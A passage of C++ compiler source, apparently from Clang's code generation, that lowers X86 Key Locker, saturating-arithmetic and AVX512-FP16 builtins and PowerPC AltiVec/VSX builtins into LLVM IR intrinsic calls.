llvm::Type *IntTy = ConvertType(E->getType());
Value *Ptr =
Builder.CreateIntToPtr(Ops[0], llvm::PointerType::get(IntTy, 256));
LoadInst *Load = Builder.CreateAlignedLoad(
IntTy, Ptr, getContext().getTypeAlignInChars(E->getType()));
Load->setVolatile(true);
return Load;
}
case X86::BI__builtin_ia32_paddsb512:
case X86::BI__builtin_ia32_paddsw512:
case X86::BI__builtin_ia32_paddsb256:
case X86::BI__builtin_ia32_paddsw256:
case X86::BI__builtin_ia32_paddsb128:
case X86::BI__builtin_ia32_paddsw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::sadd_sat);
case X86::BI__builtin_ia32_paddusb512:
case X86::BI__builtin_ia32_paddusw512:
case X86::BI__builtin_ia32_paddusb256:
case X86::BI__builtin_ia32_paddusw256:
case X86::BI__builtin_ia32_paddusb128:
case X86::BI__builtin_ia32_paddusw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::uadd_sat);
case X86::BI__builtin_ia32_psubsb512:
case X86::BI__builtin_ia32_psubsw512:
case X86::BI__builtin_ia32_psubsb256:
case X86::BI__builtin_ia32_psubsw256:
case X86::BI__builtin_ia32_psubsb128:
case X86::BI__builtin_ia32_psubsw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::ssub_sat);
case X86::BI__builtin_ia32_psubusb512:
case X86::BI__builtin_ia32_psubusw512:
case X86::BI__builtin_ia32_psubusb256:
case X86::BI__builtin_ia32_psubusw256:
case X86::BI__builtin_ia32_psubusb128:
case X86::BI__builtin_ia32_psubusw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::usub_sat);
case X86::BI__builtin_ia32_encodekey128_u32: {
Intrinsic::ID IID = Intrinsic::x86_encodekey128;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[0], Ops[1]});
for (int i = 0; i < 3; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Int8Ty, Ops[2], i * 16);
Ptr = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Extract->getType()));
Builder.CreateAlignedStore(Extract, Ptr, Align(1));
}
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_encodekey256_u32: {
Intrinsic::ID IID = Intrinsic::x86_encodekey256;
Value *Call =
Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[0], Ops[1], Ops[2]});
for (int i = 0; i < 4; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Int8Ty, Ops[3], i * 16);
Ptr = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Extract->getType()));
Builder.CreateAlignedStore(Extract, Ptr, Align(1));
}
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_aesenc128kl_u8:
case X86::BI__builtin_ia32_aesdec128kl_u8:
case X86::BI__builtin_ia32_aesenc256kl_u8:
case X86::BI__builtin_ia32_aesdec256kl_u8: {
Intrinsic::ID IID;
StringRef BlockName;
switch (BuiltinID) {
default:
llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_aesenc128kl_u8:
IID = Intrinsic::x86_aesenc128kl;
BlockName = "aesenc128kl";
break;
case X86::BI__builtin_ia32_aesdec128kl_u8:
IID = Intrinsic::x86_aesdec128kl;
BlockName = "aesdec128kl";
break;
case X86::BI__builtin_ia32_aesenc256kl_u8:
IID = Intrinsic::x86_aesenc256kl;
BlockName = "aesenc256kl";
break;
case X86::BI__builtin_ia32_aesdec256kl_u8:
IID = Intrinsic::x86_aesdec256kl;
BlockName = "aesdec256kl";
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[1], Ops[2]});
BasicBlock *NoError =
createBasicBlock(BlockName + "_no_error", this->CurFn);
BasicBlock *Error = createBasicBlock(BlockName + "_error", this->CurFn);
BasicBlock *End = createBasicBlock(BlockName + "_end", this->CurFn);
Value *Ret = Builder.CreateExtractValue(Call, 0);
Value *Succ = Builder.CreateTrunc(Ret, Builder.getInt1Ty());
Value *Out = Builder.CreateExtractValue(Call, 1);
Builder.CreateCondBr(Succ, NoError, Error);
Builder.SetInsertPoint(NoError);
Builder.CreateDefaultAlignedStore(Out, Ops[0]);
Builder.CreateBr(End);
Builder.SetInsertPoint(Error);
Constant *Zero = llvm::Constant::getNullValue(Out->getType());
Builder.CreateDefaultAlignedStore(Zero, Ops[0]);
Builder.CreateBr(End);
Builder.SetInsertPoint(End);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_aesencwide128kl_u8:
case X86::BI__builtin_ia32_aesdecwide128kl_u8:
case X86::BI__builtin_ia32_aesencwide256kl_u8:
case X86::BI__builtin_ia32_aesdecwide256kl_u8: {
Intrinsic::ID IID;
StringRef BlockName;
switch (BuiltinID) {
case X86::BI__builtin_ia32_aesencwide128kl_u8:
IID = Intrinsic::x86_aesencwide128kl;
BlockName = "aesencwide128kl";
break;
case X86::BI__builtin_ia32_aesdecwide128kl_u8:
IID = Intrinsic::x86_aesdecwide128kl;
BlockName = "aesdecwide128kl";
break;
case X86::BI__builtin_ia32_aesencwide256kl_u8:
IID = Intrinsic::x86_aesencwide256kl;
BlockName = "aesencwide256kl";
break;
case X86::BI__builtin_ia32_aesdecwide256kl_u8:
IID = Intrinsic::x86_aesdecwide256kl;
BlockName = "aesdecwide256kl";
break;
}
llvm::Type *Ty = FixedVectorType::get(Builder.getInt64Ty(), 2);
Value *InOps[9];
InOps[0] = Ops[2];
for (int i = 0; i != 8; ++i) {
Value *Ptr = Builder.CreateConstGEP1_32(Ty, Ops[1], i);
InOps[i + 1] = Builder.CreateAlignedLoad(Ty, Ptr, Align(16));
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), InOps);
BasicBlock *NoError =
createBasicBlock(BlockName + "_no_error", this->CurFn);
BasicBlock *Error = createBasicBlock(BlockName + "_error", this->CurFn);
BasicBlock *End = createBasicBlock(BlockName + "_end", this->CurFn);
Value *Ret = Builder.CreateExtractValue(Call, 0);
Value *Succ = Builder.CreateTrunc(Ret, Builder.getInt1Ty());
Builder.CreateCondBr(Succ, NoError, Error);
Builder.SetInsertPoint(NoError);
for (int i = 0; i != 8; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Extract->getType(), Ops[0], i);
Builder.CreateAlignedStore(Extract, Ptr, Align(16));
}
Builder.CreateBr(End);
Builder.SetInsertPoint(Error);
for (int i = 0; i != 8; ++i) {
Value *Out = Builder.CreateExtractValue(Call, i + 1);
Constant *Zero = llvm::Constant::getNullValue(Out->getType());
Value *Ptr = Builder.CreateConstGEP1_32(Out->getType(), Ops[0], i);
Builder.CreateAlignedStore(Zero, Ptr, Align(16));
}
Builder.CreateBr(End);
Builder.SetInsertPoint(End);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_vfcmaddcph512_mask:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcph512_mask: {
Intrinsic::ID IID = IsConjFMA
? Intrinsic::x86_avx512fp16_mask_vfcmadd_cph_512
: Intrinsic::x86_avx512fp16_mask_vfmadd_cph_512;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
return EmitX86Select(*this, Ops[3], Call, Ops[0]);
}
case X86::BI__builtin_ia32_vfcmaddcsh_round_mask:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcsh_round_mask: {
Intrinsic::ID IID = IsConjFMA ? Intrinsic::x86_avx512fp16_mask_vfcmadd_csh
: Intrinsic::x86_avx512fp16_mask_vfmadd_csh;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
Value *And = Builder.CreateAnd(Ops[3], llvm::ConstantInt::get(Int8Ty, 1));
return EmitX86Select(*this, And, Call, Ops[0]);
}
case X86::BI__builtin_ia32_vfcmaddcsh_round_mask3:
IsConjFMA = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_vfmaddcsh_round_mask3: {
Intrinsic::ID IID = IsConjFMA ? Intrinsic::x86_avx512fp16_mask_vfcmadd_csh
: Intrinsic::x86_avx512fp16_mask_vfmadd_csh;
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
static constexpr int Mask[] = {0, 5, 6, 7};
return Builder.CreateShuffleVector(Call, Ops[2], Mask);
}
}
}
Value *CodeGenFunction::EmitPPCBuiltinExpr(unsigned BuiltinID,
const CallExpr *E) {
SmallVector<Value*, 4> Ops;
for (unsigned i = 0, e = E->getNumArgs(); i != e; i++) {
if (E->getArg(i)->getType()->isArrayType())
Ops.push_back(EmitArrayToPointerDecay(E->getArg(i)).getPointer());
else
Ops.push_back(EmitScalarExpr(E->getArg(i)));
}
Intrinsic::ID ID = Intrinsic::not_intrinsic;
switch (BuiltinID) {
default: return nullptr;
// __builtin_ppc_get_timebase is GCC 4.8+'s PowerPC-specific name for what we
// call __builtin_readcyclecounter.
case PPC::BI__builtin_ppc_get_timebase:
return Builder.CreateCall(CGM.getIntrinsic(Intrinsic::readcyclecounter));
// vec_ld, vec_xl_be, vec_lvsl, vec_lvsr
case PPC::BI__builtin_altivec_lvx:
case PPC::BI__builtin_altivec_lvxl:
case PPC::BI__builtin_altivec_lvebx:
case PPC::BI__builtin_altivec_lvehx:
case PPC::BI__builtin_altivec_lvewx:
case PPC::BI__builtin_altivec_lvsl:
case PPC::BI__builtin_altivec_lvsr:
case PPC::BI__builtin_vsx_lxvd2x:
case PPC::BI__builtin_vsx_lxvw4x:
case PPC::BI__builtin_vsx_lxvd2x_be:
case PPC::BI__builtin_vsx_lxvw4x_be:
case PPC::BI__builtin_vsx_lxvl:
case PPC::BI__builtin_vsx_lxvll:
{
if(BuiltinID == PPC::BI__builtin_vsx_lxvl ||
BuiltinID == PPC::BI__builtin_vsx_lxvll){
Ops[0] = Builder.CreateBitCast(Ops[0], Int8PtrTy);
}else {
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
Ops[0] = Builder.CreateGEP(Int8Ty, Ops[1], Ops[0]);
Ops.pop_back();
}
switch (BuiltinID) {
default: llvm_unreachable("Unsupported ld/lvsl/lvsr intrinsic!");
case PPC::BI__builtin_altivec_lvx:
ID = Intrinsic::ppc_altivec_lvx;
break;
case PPC::BI__builtin_altivec_lvxl:
ID = Intrinsic::ppc_altivec_lvxl;
break;
case PPC::BI__builtin_altivec_lvebx:
ID = Intrinsic::ppc_altivec_lvebx;
break;
case PPC::BI__builtin_altivec_lvehx:
ID = Intrinsic::ppc_altivec_lvehx;
break;
case PPC::BI__builtin_altivec_lvewx:
ID = Intrinsic::ppc_altivec_lvewx;
break;
case PPC::BI__builtin_altivec_lvsl:
ID = Intrinsic::ppc_altivec_lvsl;
break;
case PPC::BI__builtin_altivec_lvsr:
ID = Intrinsic::ppc_altivec_lvsr;
break;
case PPC::BI__builtin_vsx_lxvd2x:
ID = Intrinsic::ppc_vsx_lxvd2x;
break;
case PPC::BI__builtin_vsx_lxvw4x:
ID = Intrinsic::ppc_vsx_lxvw4x;
break;
case PPC::BI__builtin_vsx_lxvd2x_be:
ID = Intrinsic::ppc_vsx_lxvd2x_be;
break;
case PPC::BI__builtin_vsx_lxvw4x_be:
ID = Intrinsic::ppc_vsx_lxvw4x_be;
break;
case PPC::BI__builtin_vsx_lxvl:
ID = Intrinsic::ppc_vsx_lxvl;
break;
case PPC::BI__builtin_vsx_lxvll:
ID = Intrinsic::ppc_vsx_lxvll;
break;
}
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
// vec_st, vec_xst_be
case PPC::BI__builtin_altivec_stvx:
case PPC::BI__builtin_altivec_stvxl:
case PPC::BI__builtin_altivec_stvebx:
case PPC::BI__builtin_altivec_stvehx:
case PPC::BI__builtin_altivec_stvewx:
case PPC::BI__builtin_vsx_stxvd2x:
case PPC::BI__builtin_vsx_stxvw4x:
case PPC::BI__builtin_vsx_stxvd2x_be:
case PPC::BI__builtin_vsx_stxvw4x_be:
case PPC::BI__builtin_vsx_stxvl:
case PPC::BI__builtin_vsx_stxvll:
{
if(BuiltinID == PPC::BI__builtin_vsx_stxvl ||
BuiltinID == PPC::BI__builtin_vsx_stxvll ){
Ops[1] = Builder.CreateBitCast(Ops[1], Int8PtrTy);
}else {
Ops[2] = Builder.CreateBitCast(Ops[2], Int8PtrTy);
Ops[1] = Builder.CreateGEP(Int8Ty, Ops[2], Ops[1]);
Ops.pop_back();
}
switch (BuiltinID) {
default: llvm_unreachable("Unsupported st intrinsic!");
case PPC::BI__builtin_altivec_stvx:
ID = Intrinsic::ppc_altivec_stvx;
break;
case PPC::BI__builtin_altivec_stvxl:
ID = Intrinsic::ppc_altivec_stvxl;
break;
case PPC::BI__builtin_altivec_stvebx:
ID = Intrinsic::ppc_altivec_stvebx;
break;
case PPC::BI__builtin_altivec_stvehx:
ID = Intrinsic::ppc_altivec_stvehx;
break;
case PPC::BI__builtin_altivec_stvewx:
ID = Intrinsic::ppc_altivec_stvewx;
break;
case PPC::BI__builtin_vsx_stxvd2x:
ID = Intrinsic::ppc_vsx_stxvd2x;
break;
case PPC::BI__builtin_vsx_stxvw4x:
ID = Intrinsic::ppc_vsx_stxvw4x;
break;
case PPC::BI__builtin_vsx_stxvd2x_be:
ID = Intrinsic::ppc_vsx_stxvd2x_be;
break;
case PPC::BI__builtin_vsx_stxvw4x_be:
ID = Intrinsic::ppc_vsx_stxvw4x_be;
break;
case PPC::BI__builtin_vsx_stxvl:
ID = Intrinsic::ppc_vsx_stxvl;
break;
case PPC::BI__builtin_vsx_stxvll:
ID = Intrinsic::ppc_vsx_stxvll;
break;
}
llvm::Function *F = CGM.getIntrinsic(ID);
return Builder.CreateCall(F, Ops, "");
}
case PPC::BI__builtin_vsx_ldrmb: {
// Essentially boils down to performing an unaligned VMX load sequence so
// as to avoid crossing a page boundary and then shuffling the elements
// into the right side of the vector register.
int64_t NumBytes = cast<ConstantInt>(Ops[1])->getZExtValue();
llvm::Type *ResTy = ConvertType(E->getType());
bool IsLE = getTarget().isLittleEndian();
// If the user wants the entire vector, just load the entire vector.
if (NumBytes == 16) {
Value *BC = Builder.CreateBitCast(Ops[0], ResTy->getPointerTo());
Value *LD = Builder.CreateLoad(Address(BC, CharUnits::fromQuantity(1)));
if (!IsLE)
return LD;
// Reverse the bytes on LE.
SmallVector<int, 16> RevMask;
for (int Idx = 0; Idx < 16; Idx++)
RevMask.push_back(15 - Idx);
return Builder.CreateShuffleVector(LD, LD, RevMask);
}
llvm::Function *Lvx = CGM.getIntrinsic(Intrinsic::ppc_altivec_lvx);
llvm::Function *Lvs = CGM.getIntrinsic(IsLE ? Intrinsic::ppc_altivec_lvsr
: Intrinsic::ppc_altivec_lvsl);
llvm::Function *Vperm = CGM.getIntrinsic(Intrinsic::ppc_altivec_vperm);
Value *HiMem = Builder.CreateGEP(
Int8Ty, Ops[0], ConstantInt::get(Ops[1]->getType(), NumBytes - 1));
Value *LoLd = Builder.CreateCall(Lvx, Ops[0], "ld.lo");
Value *HiLd = Builder.CreateCall(Lvx, HiMem, "ld.hi");
Value *Mask1 = Builder.CreateCall(Lvs, Ops[0], "mask1");
Ops.clear();
Ops.push_back(IsLE ? HiLd : LoLd);
Ops.push_back(IsLE ? LoLd : HiLd);
Ops.push_back(Mask1);
Value *AllElts = Builder.CreateCall(Vperm, Ops, "shuffle1");
Constant *Zero = llvm::Constant::getNullValue(IsLE ? ResTy : AllElts->getType());
if (IsLE) {
SmallVector<int, 16> Consts;
for (int Idx = 0; Idx < 16; Idx++) {
int Val = (NumBytes - Idx - 1 >= 0) ? (NumBytes - Idx - 1)
: 16 - (NumBytes - Idx);
Consts.push_back(Val);
}
return Builder.CreateShuffleVector(Builder.CreateBitCast(AllElts, ResTy),
Zero, Consts);
}
SmallVector<Constant *, 16> Consts;
for (int Idx = 0; Idx < 16; Idx++)
Consts.push_back(Builder.getInt8(NumBytes + Idx));
Value *Mask2 = ConstantVector::get(Consts);
return Builder.CreateBitCast(
Builder.CreateCall(Vperm, {Zero, AllElts, Mask2}, "shuffle2"), ResTy);
}
case PPC::BI__builtin_vsx_strmb: {
int64_t NumBytes = cast<ConstantInt>(Ops[1])->getZExtValue();
bool IsLE = getTarget().isLittleEndian();
auto StoreSubVec = [&](unsigned Width, unsigned Offset, unsigned EltNo) {
// Storing the whole vector, simply store it on BE and reverse bytes and
// store on LE.
if (Width == 16) {
Value *BC =
Builder.CreateBitCast(Ops[0], Ops[2]->getType()->getPointerTo());
Value *StVec = Ops[2];
if (IsLE) {
SmallVector<int, 16> RevMask;
for (int Idx = 0; Idx < 16; Idx++)
RevMask.push_back(15 - Idx);
StVec = Builder.CreateShuffleVector(Ops[2], Ops[2], RevMask);
}
return Builder.CreateStore(StVec,
Address(BC, CharUnits::fromQuantity(1)));
}
auto *ConvTy = Int64Ty;
unsigned NumElts = 0;
switch (Width) {
default:
llvm_unreachable("width for stores must be a power of 2");
case 8:
ConvTy = Int64Ty;
NumElts = 2;
break;
case 4:
ConvTy = Int32Ty;
NumElts = 4;
break;
case 2:
ConvTy = Int16Ty;
NumElts = 8;
break;
case 1:
ConvTy = Int8Ty;
NumElts = 16;
break;
}
Value *Vec = Builder.CreateBitCast(
Ops[2], llvm::FixedVectorType::get(ConvTy, NumElts));
Value *Ptr = Builder.CreateGEP(Int8Ty, Ops[0],
ConstantInt::get(Int64Ty, Offset));
Value *PtrBC = Builder.CreateBitCast(Ptr, ConvTy->getPointerTo());
Value *Elt = Builder.CreateExtractElement(Vec, EltNo);
if (IsLE && Width > 1) {
Function *F = CGM.getIntrinsic(Intrinsic::bswap, ConvTy);
Elt = Builder.CreateCall(F, Elt);
}
return Builder.CreateStore(Elt,
Address(PtrBC, CharUnits::fromQuantity(1)));
};
unsigned Stored = 0;
unsigned RemainingBytes = NumBytes;
Value *Result;
if (NumBytes == 16)
return StoreSubVec(16, 0, 0);
if (NumBytes >= 8) {
Result = StoreSubVec(8, NumBytes - 8, IsLE ? 0 : 1);
RemainingBytes -= 8;
Stored += 8;
}
if (RemainingBytes >= 4) {
Result = StoreSubVec(4, NumBytes - Stored - 4,
IsLE ? (Stored >> 2) : 3 - (Stored >> 2));
RemainingBytes -= 4;
Stored += 4;
}
if (RemainingBytes >= 2) {
Result = StoreSubVec(2, NumBytes - Stored - 2,
IsLE ? (Stored >> 1) : 7 - (Stored >> 1));
RemainingBytes -= 2;
Stored += 2;
}
if (RemainingBytes)
Result =
StoreSubVec(1, NumBytes - Stored - 1, IsLE ? Stored : 15 - Stored);
return Result;
}
// Square root
case PPC::BI__builtin_vsx_xvsqrtsp:
case PPC::BI__builtin_vsx_xvsqrtdp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (Builder.getIsFPConstrained()) {
llvm::Function *F = CGM.getIntrinsic(
Intrinsic::experimental_constrained_sqrt, ResultType);
return Builder.CreateConstrainedFPCall(F, X);
} else {
llvm::Function *F = CGM.getIntrinsic(Intrinsic::sqrt, ResultType);
return Builder.CreateCall(F, X);
}
}
// Count leading zeros
case PPC::BI__builtin_altivec_vclzb:
case PPC::BI__builtin_altivec_vclzh:
case PPC::BI__builtin_altivec_vclzw:
case PPC::BI__builtin_altivec_vclzd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::ctlz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case PPC::BI__builtin_altivec_vctzb:
case PPC::BI__builtin_altivec_vctzh:
case PPC::BI__builtin_altivec_vctzw:
case PPC::BI__builtin_altivec_vctzd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Undef = ConstantInt::get(Builder.getInt1Ty(), false);
Function *F = CGM.getIntrinsic(Intrinsic::cttz, ResultType);
return Builder.CreateCall(F, {X, Undef});
}
case PPC::BI__builtin_altivec_vec_replace_elt:
case PPC::BI__builtin_altivec_vec_replace_unaligned: {
// The third argument of vec_replace_elt and vec_replace_unaligned must
// be a compile time constant and will be emitted either to the vinsw
// or vinsd instruction.
ConstantInt *ArgCI = dyn_cast<ConstantInt>(Ops[2]);
assert(ArgCI &&
"Third Arg to vinsw/vinsd intrinsic must be a constant integer!");
llvm::Type *ResultType = ConvertType(E->getType());
llvm::Function *F = nullptr;
Value *Call = nullptr;
int64_t ConstArg = ArgCI->getSExtValue();
unsigned ArgWidth = Ops[1]->getType()->getPrimitiveSizeInBits();
bool Is32Bit = false;
assert((ArgWidth == 32 || ArgWidth == 64) && "Invalid argument width");
// The input to vec_replace_elt is an element index, not a byte index.
if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt)
ConstArg *= ArgWidth / 8;
if (ArgWidth == 32) {
Is32Bit = true;
// When the second argument is 32 bits, it can either be an integer or
// a float. The vinsw intrinsic is used in this case.
F = CGM.getIntrinsic(Intrinsic::ppc_altivec_vinsw);
// Fix the constant according to endianess.
if (getTarget().isLittleEndian())
ConstArg = 12 - ConstArg;
} else {
// When the second argument is 64 bits, it can either be a long long or
// a double. The vinsd intrinsic is used in this case.
F = CGM.getIntrinsic(Intrinsic::ppc_altivec_vinsd);
// Fix the constant for little endian.
if (getTarget().isLittleEndian())
ConstArg = 8 - ConstArg;
}
Ops[2] = ConstantInt::getSigned(Int32Ty, ConstArg);
// Depending on ArgWidth, the input vector could be a float or a double.
// If the input vector is a float type, bitcast the inputs to integers. Or,
// if the input vector is a double, bitcast the inputs to 64-bit integers.
if (!Ops[1]->getType()->isIntegerTy(ArgWidth)) {
Ops[0] = Builder.CreateBitCast(
Ops[0], Is32Bit ? llvm::FixedVectorType::get(Int32Ty, 4)
: llvm::FixedVectorType::get(Int64Ty, 2));
Ops[1] = Builder.CreateBitCast(Ops[1], Is32Bit ? Int32Ty : Int64Ty);
}
// Emit the call to vinsw or vinsd.
Call = Builder.CreateCall(F, Ops);
// Depending on the builtin, bitcast to the approriate result type.
if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt &&
!Ops[1]->getType()->isIntegerTy())
return Builder.CreateBitCast(Call, ResultType);
else if (BuiltinID == PPC::BI__builtin_altivec_vec_replace_elt &&
Ops[1]->getType()->isIntegerTy())
return Call;
else
return Builder.CreateBitCast(Call,
llvm::FixedVectorType::get(Int8Ty, 16));
}
case PPC::BI__builtin_altivec_vpopcntb:
case PPC::BI__builtin_altivec_vpopcnth:
case PPC::BI__builtin_altivec_vpopcntw:
case PPC::BI__builtin_altivec_vpopcntd: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ResultType);
return Builder.CreateCall(F, X);
}
case PPC::BI__builtin_altivec_vadduqm:
case PPC::BI__builtin_altivec_vsubuqm: {
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
Ops[0] =
Builder.CreateBitCast(Ops[0], llvm::FixedVectorType::get(Int128Ty, 1));
Ops[1] =
Builder.CreateBitCast(Ops[1], llvm::FixedVectorType::get(Int128Ty, 1));
if (BuiltinID == PPC::BI__builtin_altivec_vadduqm)
return Builder.CreateAdd(Ops[0], Ops[1], "vadduqm");
else
return Builder.CreateSub(Ops[0], Ops[1], "vsubuqm");
}
// Rotate and insert under mask operation.
// __rldimi(rs, is, shift, mask)
// (rotl64(rs, shift) & mask) | (is & ~mask)
// __rlwimi(rs, is, shift, mask)
// (rotl(rs, shift) & mask) | (is & ~mask)
case PPC::BI__builtin_ppc_rldimi:
case PPC::BI__builtin_ppc_rlwimi: {
llvm::Type *Ty = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
if (BuiltinID == PPC::BI__builtin_ppc_rldimi)
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
Value *Shift = Builder.CreateCall(F, {Ops[0], Ops[0], Ops[2]});
Value *X = Builder.CreateAnd(Shift, Ops[3]);
Value *Y = Builder.CreateAnd(Ops[1], Builder.CreateNot(Ops[3]));
return Builder.CreateOr(X, Y);
}
// Rotate and insert under mask operation.
// __rlwnm(rs, shift, mask)
// rotl(rs, shift) & mask
case PPC::BI__builtin_ppc_rlwnm: {
llvm::Type *Ty = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::fshl, Ty);
Value *Shift = Builder.CreateCall(F, {Ops[0], Ops[0], Ops[1]});
return Builder.CreateAnd(Shift, Ops[2]);
}
case PPC::BI__builtin_ppc_poppar4:
case PPC::BI__builtin_ppc_poppar8: {
llvm::Type *ArgType = Ops[0]->getType();
Function *F = CGM.getIntrinsic(Intrinsic::ctpop, ArgType);
Value *Tmp = Builder.CreateCall(F, Ops[0]);
llvm::Type *ResultType = ConvertType(E->getType());
Value *Result = Builder.CreateAnd(Tmp, llvm::ConstantInt::get(ArgType, 1));
if (Result->getType() != ResultType)
Result = Builder.CreateIntCast(Result, ResultType, /*isSigned*/true,
"cast");
return Result;
}
case PPC::BI__builtin_ppc_cmpb: {
if (getTarget().getTriple().isPPC64()) {
Function *F =
CGM.getIntrinsic(Intrinsic::ppc_cmpb, {Int64Ty, Int64Ty, Int64Ty});
return Builder.CreateCall(F, Ops, "cmpb");
}
// For 32 bit, emit the code as below:
// %conv = trunc i64 %a to i32
// %conv1 = trunc i64 %b to i32
// %shr = lshr i64 %a, 32
// %conv2 = trunc i64 %shr to i32
// %shr3 = lshr i64 %b, 32
// %conv4 = trunc i64 %shr3 to i32
// %0 = tail call i32 @llvm.ppc.cmpb32(i32 %conv, i32 %conv1)
// %conv5 = zext i32 %0 to i64
// %1 = tail call i32 @llvm.ppc.cmpb32(i32 %conv2, i32 %conv4)
// %conv614 = zext i32 %1 to i64
// %shl = shl nuw i64 %conv614, 32
// %or = or i64 %shl, %conv5
// ret i64 %or
Function *F =
CGM.getIntrinsic(Intrinsic::ppc_cmpb, {Int32Ty, Int32Ty, Int32Ty});
Value *ArgOneLo = Builder.CreateTrunc(Ops[0], Int32Ty);
Value *ArgTwoLo = Builder.CreateTrunc(Ops[1], Int32Ty);
Constant *ShiftAmt = ConstantInt::get(Int64Ty, 32);
Value *ArgOneHi =
Builder.CreateTrunc(Builder.CreateLShr(Ops[0], ShiftAmt), Int32Ty);
Value *ArgTwoHi =
Builder.CreateTrunc(Builder.CreateLShr(Ops[1], ShiftAmt), Int32Ty);
Value *ResLo = Builder.CreateZExt(
Builder.CreateCall(F, {ArgOneLo, ArgTwoLo}, "cmpb"), Int64Ty);
Value *ResHiShift = Builder.CreateZExt(
Builder.CreateCall(F, {ArgOneHi, ArgTwoHi}, "cmpb"), Int64Ty);
Value *ResHi = Builder.CreateShl(ResHiShift, ShiftAmt);
return Builder.CreateOr(ResLo, ResHi);
}
// Copy sign
case PPC::BI__builtin_vsx_xvcpsgnsp:
case PPC::BI__builtin_vsx_xvcpsgndp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
Value *Y = EmitScalarExpr(E->getArg(1));
ID = Intrinsic::copysign;
llvm::Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.CreateCall(F, {X, Y});
}
// Rounding/truncation
case PPC::BI__builtin_vsx_xvrspip:
case PPC::BI__builtin_vsx_xvrdpip:
case PPC::BI__builtin_vsx_xvrdpim:
case PPC::BI__builtin_vsx_xvrspim:
case PPC::BI__builtin_vsx_xvrdpi:
case PPC::BI__builtin_vsx_xvrspi:
case PPC::BI__builtin_vsx_xvrdpic:
case PPC::BI__builtin_vsx_xvrspic:
case PPC::BI__builtin_vsx_xvrdpiz:
case PPC::BI__builtin_vsx_xvrspiz: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
if (BuiltinID == PPC::BI__builtin_vsx_xvrdpim ||
BuiltinID == PPC::BI__builtin_vsx_xvrspim)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_floor
: Intrinsic::floor;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpi ||
BuiltinID == PPC::BI__builtin_vsx_xvrspi)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_round
: Intrinsic::round;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpic ||
BuiltinID == PPC::BI__builtin_vsx_xvrspic)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_rint
: Intrinsic::rint;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpip ||
BuiltinID == PPC::BI__builtin_vsx_xvrspip)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_ceil
: Intrinsic::ceil;
else if (BuiltinID == PPC::BI__builtin_vsx_xvrdpiz ||
BuiltinID == PPC::BI__builtin_vsx_xvrspiz)
ID = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_trunc
: Intrinsic::trunc;
llvm::Function *F = CGM.getIntrinsic(ID, ResultType);
return Builder.getIsFPConstrained() ? Builder.CreateConstrainedFPCall(F, X)
: Builder.CreateCall(F, X);
}
// Absolute value
case PPC::BI__builtin_vsx_xvabsdp:
case PPC::BI__builtin_vsx_xvabssp: {
llvm::Type *ResultType = ConvertType(E->getType());
Value *X = EmitScalarExpr(E->getArg(0));
llvm::Function *F = CGM.getIntrinsic(Intrinsic::fabs, ResultType);
return Builder.CreateCall(F, X);
}
// Fastmath by default
case PPC::BI__builtin_ppc_recipdivf:
